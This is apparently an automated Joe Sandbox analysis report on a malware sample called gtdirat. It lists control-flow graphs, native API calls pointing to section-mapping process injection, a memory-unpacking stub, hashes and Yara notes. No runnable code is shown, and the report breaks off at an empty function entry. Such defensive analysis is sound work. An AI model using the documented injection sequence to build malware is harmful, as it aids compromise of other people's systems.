                                                                                                                                                                                                                                        control_flow_graph 138 4015d5-401605 143 401608-401632 call 40125c 138->143 144 4015fb-401601 138->144 150 401634 143->150 151 401637-40163c 143->151 144->143 150->151 153 401642-401653 151->153 154 401959-401961 151->154 158 401957 153->158 159 401659-401682 153->159 154->151 157 401966-4019af call 40125c 154->157 158->157 159->158 167 401688-40169f NtDuplicateObject 159->167 167->158 169 4016a5-4016c9 NtCreateSection 167->169 171 401725-40174b NtCreateSection 169->171 172 4016cb-4016ec NtMapViewOfSection 169->172 171->158 174 401751-401755 171->174 172->171 173 4016ee-40170a NtMapViewOfSection 172->173 173->171 176 40170c-401722 173->176 174->158 177 40175b-40177c NtMapViewOfSection 174->177 176->171 177->158 179 401782-40179e NtMapViewOfSection 177->179 179->158 182 4017a4 call 4017a9 179->182
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                                                                                                                                                        • Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00401603 Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 185 401603-401605 187 401608-401632 call 40125c 185->187 188 4015fb-401601 185->188 194 401634 187->194 195 401637-40163c 187->195 188->187 194->195 197 401642-401653 195->197 198 401959-401961 195->198 202 401957 197->202 203 401659-401682 197->203 198->195 201 401966-4019af call 40125c 198->201 202->201 203->202 211 401688-40169f NtDuplicateObject 203->211 211->202 213 4016a5-4016c9 NtCreateSection 211->213 215 401725-40174b NtCreateSection 213->215 216 4016cb-4016ec NtMapViewOfSection 213->216 215->202 218 401751-401755 215->218 216->215 217 4016ee-40170a NtMapViewOfSection 216->217 217->215 220 40170c-401722 217->220 218->202 221 40175b-40177c NtMapViewOfSection 218->221 220->215 221->202 223 401782-40179e NtMapViewOfSection 221->223 223->202 226 4017a4 call 4017a9 223->226
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                                                                                                                        • Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                                                                                                                                                        • Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 177nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 229 4015e0-401605 232 401608-401632 call 40125c 229->232 233 4015fb-401601 229->233 239 401634 232->239 240 401637-40163c 232->240 233->232 239->240 242 401642-401653 240->242 243 401959-401961 240->243 247 401957 242->247 248 401659-401682 242->248 243->240 246 401966-4019af call 40125c 243->246 247->246 248->247 256 401688-40169f NtDuplicateObject 248->256 256->247 258 4016a5-4016c9 NtCreateSection 256->258 260 401725-40174b NtCreateSection 258->260 261 4016cb-4016ec NtMapViewOfSection 258->261 260->247 263 401751-401755 260->263 261->260 262 4016ee-40170a NtMapViewOfSection 261->262 262->260 265 40170c-401722 262->265 263->247 266 40175b-40177c NtMapViewOfSection 263->266 265->260 266->247 268 401782-40179e NtMapViewOfSection 266->268 268->247 271 4017a4 call 4017a9 268->271
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                                                                                                                                                        • Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015F1 Relevance: 10.7, APIs: 7, Instructions: 177nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 274 4015f1-401605 279 401608-401632 call 40125c 274->279 280 4015fb-401601 274->280 286 401634 279->286 287 401637-40163c 279->287 280->279 286->287 289 401642-401653 287->289 290 401959-401961 287->290 294 401957 289->294 295 401659-401682 289->295 290->287 293 401966-4019af call 40125c 290->293 294->293 295->294 303 401688-40169f NtDuplicateObject 295->303 303->294 305 4016a5-4016c9 NtCreateSection 303->305 307 401725-40174b NtCreateSection 305->307 308 4016cb-4016ec NtMapViewOfSection 305->308 307->294 310 401751-401755 307->310 308->307 309 4016ee-40170a NtMapViewOfSection 308->309 309->307 312 40170c-401722 309->312 310->294 313 40175b-40177c NtMapViewOfSection 310->313 312->307 313->294 315 401782-40179e NtMapViewOfSection 313->315 315->294 318 4017a4 call 4017a9 315->318
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                                                                                                                                                        • Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015F5 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 321 4015f5-401605 324 401608-401632 call 40125c 321->324 325 4015fb-401601 321->325 331 401634 324->331 332 401637-40163c 324->332 325->324 331->332 334 401642-401653 332->334 335 401959-401961 332->335 339 401957 334->339 340 401659-401682 334->340 335->332 338 401966-4019af call 40125c 335->338 339->338 340->339 348 401688-40169f NtDuplicateObject 340->348 348->339 350 4016a5-4016c9 NtCreateSection 348->350 352 401725-40174b NtCreateSection 350->352 353 4016cb-4016ec NtMapViewOfSection 350->353 352->339 355 401751-401755 352->355 353->352 354 4016ee-40170a NtMapViewOfSection 353->354 354->352 357 40170c-401722 354->357 355->339 358 40175b-40177c NtMapViewOfSection 355->358 357->352 358->339 360 401782-40179e NtMapViewOfSection 358->360 360->339 363 4017a4 call 4017a9 360->363
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                                                                                                                                                        • Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004015F8 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 366 4015f8-401632 call 40125c 374 401634 366->374 375 401637-40163c 366->375 374->375 377 401642-401653 375->377 378 401959-401961 375->378 382 401957 377->382 383 401659-401682 377->383 378->375 381 401966-4019af call 40125c 378->381 382->381 383->382 391 401688-40169f NtDuplicateObject 383->391 391->382 393 4016a5-4016c9 NtCreateSection 391->393 395 401725-40174b NtCreateSection 393->395 396 4016cb-4016ec NtMapViewOfSection 393->396 395->382 398 401751-401755 395->398 396->395 397 4016ee-40170a NtMapViewOfSection 396->397 397->395 400 40170c-401722 397->400 398->382 401 40175b-40177c NtMapViewOfSection 398->401 400->395 401->382 403 401782-40179e NtMapViewOfSection 401->403 403->382 406 4017a4 call 4017a9 403->406
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                                                                                                                                                        • Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040161A Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 409 40161a-401632 call 40125c 415 401634 409->415 416 401637-40163c 409->416 415->416 418 401642-401653 416->418 419 401959-401961 416->419 423 401957 418->423 424 401659-401682 418->424 419->416 422 401966-4019af call 40125c 419->422 423->422 424->423 432 401688-40169f NtDuplicateObject 424->432 432->423 434 4016a5-4016c9 NtCreateSection 432->434 436 401725-40174b NtCreateSection 434->436 437 4016cb-4016ec NtMapViewOfSection 434->437 436->423 439 401751-401755 436->439 437->436 438 4016ee-40170a NtMapViewOfSection 437->438 438->436 441 40170c-401722 438->441 439->423 442 40175b-40177c NtMapViewOfSection 439->442 441->436 442->423 444 401782-40179e NtMapViewOfSection 442->444 444->423 447 4017a4 call 4017a9 444->447
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                                                                                                                        • Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                                                                                                                                                        • Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004017DF Relevance: 3.0, APIs: 2, Instructions: 30nativeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 463 4017df-4017e7 NtMapViewOfSection 465 401782-40179e NtMapViewOfSection 463->465 466 401957-4019af call 40125c 463->466 465->466 468 4017a4 call 4017a9 465->468
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2357951026.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_gtdirat.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Section$View$CreateDuplicateObject
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3617974760-0
                                                                                                                                                                                                                                        • Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                                                                                                                                                        • Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00C7003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 c7003c-c70047 1 c7004c-c70263 call c70a3f call c70e0f call c70d90 VirtualAlloc 0->1 2 c70049 0->2 17 c70265-c70289 call c70a69 1->17 18 c7028b-c70292 1->18 2->1 22 c702ce-c703c2 VirtualProtect call c70cce call c70ce7 17->22 19 c702a1-c702b0 18->19 21 c702b2-c702cc 19->21 19->22 21->19 29 c703d1-c703e0 22->29 30 c703e2-c70437 call c70ce7 29->30 31 c70439-c704b8 VirtualFree 29->31 30->29 33 c705f4-c705fe 31->33 34 c704be-c704cd 31->34 35 c70604-c7060d 33->35 36 c7077f-c70789 33->36 38 c704d3-c704dd 34->38 35->36 42 c70613-c70637 35->42 40 c707a6-c707b0 36->40 41 c7078b-c707a3 36->41 38->33 39 c704e3-c70505 38->39 51 c70517-c70520 39->51 52 c70507-c70515 39->52 44 c707b6-c707cb 40->44 45 c7086e-c708be LoadLibraryA 40->45 41->40 46 c7063e-c70648 42->46 48 c707d2-c707d5 44->48 50 c708c7-c708f9 45->50 46->36 49 c7064e-c7065a 46->49 53 c707d7-c707e0 48->53 54 c70824-c70833 48->54 49->36 55 c70660-c7066a 49->55 56 c70902-c7091d 50->56 57 c708fb-c70901 50->57 58 c70526-c70547 51->58 52->58 59 c707e4-c70822 53->59 60 c707e2 53->60 62 c70839-c7083c 54->62 61 c7067a-c70689 55->61 57->56 63 c7054d-c70550 58->63 59->48 60->54 64 c70750-c7077a 61->64 65 c7068f-c706b2 61->65 62->45 66 c7083e-c70847 62->66 68 c70556-c7056b 63->68 69 c705e0-c705ef 63->69 64->46 70 c706b4-c706ed 65->70 71 c706ef-c706fc 65->71 72 c7084b-c7086c 66->72 73 c70849 66->73 74 c7056f-c7057a 68->74 75 c7056d 68->75 69->38 70->71 76 c706fe-c70748 71->76 77 c7074b 71->77 72->62 73->45 78 c7057c-c70599 74->78 79 c7059b-c705bb 74->79 75->69 76->77 77->61 84 c705bd-c705db 78->84 79->84 84->63
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00C7024D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c70000_gtdirat.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction ID: 25fe07b0b38f56661a37238e21105fc5f9a1c13eecc238d9fd9089f6a94aa0aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20526974A00229DFDB64CF68C985BA8BBB1BF09304F1480D9E94DAB351DB30AE85DF14
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00CB4419 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
